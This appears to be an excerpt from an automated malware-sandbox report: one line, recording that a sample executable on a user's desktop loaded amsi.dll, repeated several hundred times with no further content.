Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
